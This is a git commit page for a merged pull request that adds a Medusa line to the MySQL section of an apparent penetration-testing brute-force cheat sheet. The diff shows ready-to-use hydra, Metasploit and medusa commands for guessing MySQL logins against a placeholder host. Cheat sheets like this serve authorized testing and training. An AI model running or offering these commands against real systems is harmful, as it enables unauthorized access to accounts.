Merge pull request #279 from virenpawar/patch-3

Update brute-force.md | Added Medusa for MySQL
This commit is contained in:
Carlos Polop 2021-11-24 22:33:26 +00:00 committed by GitHub
commit 3f5d733b27
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 0 deletions

View File

@ -208,8 +208,14 @@ use auxiliary/scanner/mongodb/mongodb_login
### MySQL
```bash
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql
# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
```
### OracleSQL